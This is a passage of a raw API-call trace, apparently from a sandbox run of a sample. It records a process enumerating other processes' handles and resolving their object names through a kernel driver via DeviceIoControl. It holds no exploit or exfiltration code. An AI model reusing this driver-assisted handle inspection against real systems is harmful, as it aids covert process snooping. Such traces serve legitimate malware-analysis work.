ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0114.569] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a002626630, HandleInformation=0x0) returned 0x0 [0114.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0114.570] PsReleaseProcessExitSynchronization () returned 0x2 [0114.570] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xd [0114.570] ObQueryNameString (in: Object=0xfffff8a002626630, ObjectNameInfo=0xfffffa800269a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800269a044, ReturnLength=0xfffff88005163550) returned 0x0 [0114.570] ObfDereferenceObject (Object=0xfffff8a002626630) returned 0x4 [0114.570] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0114.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0114.570] CloseHandle (hObject=0xc4) returned 1 [0114.570] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc4 [0114.570] GetCurrentProcess () returned 0xffffffffffffffff [0114.570] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x24, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0114.570] CloseHandle (hObject=0xc4) returned 1 [0114.570] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0114.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0114.570] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0114.570] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0114.570] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0114.570] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0114.571] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0114.571] PsAcquireProcessExitSynchronization () returned 0x0 [0114.571] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0114.571] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa1850, HandleInformation=0x0) returned 0x0 [0114.571] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0114.571] PsReleaseProcessExitSynchronization () returned 0x2 [0114.571] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xd [0114.571] ObQueryNameString (in: Object=0xfffffa8001fa1850, ObjectNameInfo=0xfffffa8002483044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002483044, ReturnLength=0xfffff88005163550) returned 0x0 [0114.571] ObfDereferenceObject (Object=0xfffffa8001fa1850) returned 0x2 [0114.571] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0114.571] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0114.571] CloseHandle (hObject=0xc0) returned 1 [0114.571] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0114.571] GetCurrentProcess () returned 0xffffffffffffffff [0114.571] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0114.572] CloseHandle (hObject=0xc0) returned 1 [0114.572] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0114.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2b4c50 [0114.572] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0114.572] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0114.572] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0114.572] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x5e, lpOverlapped=0x0) returned 1 [0114.572] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0114.572] PsAcquireProcessExitSynchronization () returned 0x0 [0114.572] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0114.572] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80118c4250, HandleInformation=0x0) returned 0x0 [0114.572] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0114.573] PsReleaseProcessExitSynchronization () returned 0x2 [0114.573] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xd [0114.573] ObQueryNameString (in: Object=0xfffffa80118c4250, ObjectNameInfo=0xfffffa80026ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0114.573] ObfDereferenceObject (Object=0xfffffa80118c4250) returned 0x118 [0114.573] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0114.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0114.573] CloseHandle (hObject=0xc4) returned 1 [0114.573] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc4 [0114.573] GetCurrentProcess () returned 0xffffffffffffffff [0114.573] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0114.573] CloseHandle (hObject=0xc4) returned 1 [0114.573] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0114.573] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0114.573] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0114.573] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0114.573] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0114.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x1a, lpOverlapped=0x0) returned 1 [0114.573] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0114.573] PsAcquireProcessExitSynchronization () returned 0x0 [0114.573] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0114.574] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003674090, HandleInformation=0x0) returned 0x0 [0114.574] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0114.574] PsReleaseProcessExitSynchronization () returned 0x2 [0114.574] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xd [0114.574] ObQueryNameString (in: Object=0xfffffa8003674090, ObjectNameInfo=0xfffffa80026aa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026aa044, ReturnLength=0xfffff88005163550) returned 0x0 [0114.574] ObfDereferenceObject (Object=0xfffffa8003674090) returned 0x4e6 [0114.574] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0114.574] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0114.574] CloseHandle (hObject=0xc0) returned 1 [0116.780] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0116.780] GetCurrentProcess () returned 0xffffffffffffffff [0116.780] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.780] CloseHandle (hObject=0xc0) returned 1 [0116.780] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.780] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80) returned 0x2b4c50 [0116.780] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.780] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.780] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.780] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.780] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.780] PsAcquireProcessExitSynchronization () returned 0x0 [0116.780] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0116.781] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa1c40, HandleInformation=0x0) returned 0x0 [0116.781] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.781] PsReleaseProcessExitSynchronization () returned 0x2 [0116.781] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xe [0116.781] ObQueryNameString (in: Object=0xfffffa8001fa1c40, ObjectNameInfo=0xfffffa80027fb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027fb044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.781] ObfDereferenceObject (Object=0xfffffa8001fa1c40) returned 0x4 [0116.781] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.781] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.781] CloseHandle (hObject=0xc4) returned 1 [0116.781] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc4 [0116.781] GetCurrentProcess () returned 0xffffffffffffffff [0116.781] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x10, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.781] CloseHandle (hObject=0xc4) returned 1 [0116.781] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.781] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.781] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.781] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.781] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.781] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.781] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.781] PsAcquireProcessExitSynchronization () returned 0x0 [0116.781] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0116.782] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f186a0, HandleInformation=0x0) returned 0x0 [0116.782] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.782] PsReleaseProcessExitSynchronization () returned 0x2 [0116.782] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xe [0116.782] ObQueryNameString (in: Object=0xfffffa8001f186a0, ObjectNameInfo=0xfffffa80027e8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e8044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.782] ObfDereferenceObject (Object=0xfffffa8001f186a0) returned 0x3 [0116.782] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.782] CloseHandle (hObject=0xc0) returned 1 [0116.782] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x67c) returned 0xc0 [0116.782] GetCurrentProcess () returned 0xffffffffffffffff [0116.782] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.782] CloseHandle (hObject=0xc0) returned 1 [0116.782] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x80) returned 0x2b4c50 [0116.782] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.782] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.782] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.782] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x1e, lpOverlapped=0x0) returned 1 [0116.782] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.783] PsAcquireProcessExitSynchronization () returned 0x0 [0116.783] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0116.783] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000702850, HandleInformation=0x0) returned 0x0 [0116.783] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.783] PsReleaseProcessExitSynchronization () returned 0x2 [0116.783] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0xe [0116.783] ObQueryNameString (in: Object=0xfffff8a000702850, ObjectNameInfo=0xfffffa80027e9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e9044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.783] ObfDereferenceObject (Object=0xfffff8a000702850) returned 0x98 [0116.783] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.783] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.783] CloseHandle (hObject=0xc4) returned 1 [0116.783] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x7b0) returned 0xc4 [0116.783] GetCurrentProcess () returned 0xffffffffffffffff [0116.783] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.783] CloseHandle (hObject=0xc4) returned 1 [0116.783] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.783] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.783] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.783] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.783] NtQueryInformationProcess (in: ProcessHandle=0xc0, ProcessInformationClass=0x0, ProcessInformation=0x12d538, ProcessInformationLength=0x30, ReturnLength=0x12d4b0 | out: ProcessInformation=0x12d538, ReturnLength=0x12d4b0) returned 0xc0000022 [0116.783] CloseHandle (hObject=0xc0) returned 1 [0116.784] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.784] GetCurrentProcess () returned 0xffffffffffffffff [0116.784] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x100, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.784] CloseHandle (hObject=0xc0) returned 1 [0116.784] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.784] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.784] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.784] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.784] NtQueryInformationThread (in: ThreadHandle=0xc4, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000022 [0116.784] CloseHandle (hObject=0xc4) returned 1 [0116.784] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc4 [0116.784] GetCurrentProcess () returned 0xffffffffffffffff [0116.784] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0116.784] CloseHandle (hObject=0xc4) returned 1 [0116.784] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.784] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x78) returned 0x2b4c50 [0116.784] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.784] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.784] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.784] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.784] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.784] PsAcquireProcessExitSynchronization () returned 0x0 [0116.784] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.784] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001eb7b70, HandleInformation=0x0) returned 0x0 [0116.784] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.784] PsReleaseProcessExitSynchronization () returned 0x2 [0116.785] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.785] ObQueryNameString (in: Object=0xfffffa8001eb7b70, ObjectNameInfo=0xfffffa8002483044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002483044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.785] ObfDereferenceObject (Object=0xfffffa8001eb7b70) returned 0x3 [0116.785] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.785] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.785] CloseHandle (hObject=0xc0) returned 1 [0116.785] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0116.785] GetCurrentProcess () returned 0xffffffffffffffff [0116.785] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0116.785] CloseHandle (hObject=0xc0) returned 1 [0116.785] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0116.785] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x88) returned 0x2b4c50 [0116.785] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2b4c50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x2b4c50, ReturnLength=0x0) returned 0x0 [0116.785] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b4c50 | out: hHeap=0x290000) returned 1 [0116.785] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e90090 [0116.785] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e90090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e90090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0116.785] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.785] PsAcquireProcessExitSynchronization () returned 0x0 [0116.785] KeStackAttachProcess (in: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002664760, ApcState=0xfffff880051635d0) [0116.785] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa1560, HandleInformation=0x0) returned 0x0 [0116.785] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.785] PsReleaseProcessExitSynchronization () returned 0x2 [0116.785] ObfDereferenceObject (Object=0xfffffa8002664760) returned 0x1e [0116.785] ObQueryNameString (in: Object=0xfffffa8001fa1560, ObjectNameInfo=0xfffffa800269a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800269a044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.785] ObfDereferenceObject (Object=0xfffffa8001fa1560) returned 0x2 [0116.785] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.785] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e90090 | out: hHeap=0x290000) returned 1 [0116.785] CloseHandle (hObject=0xc4) returned 1 [0116.786] OpenProcess 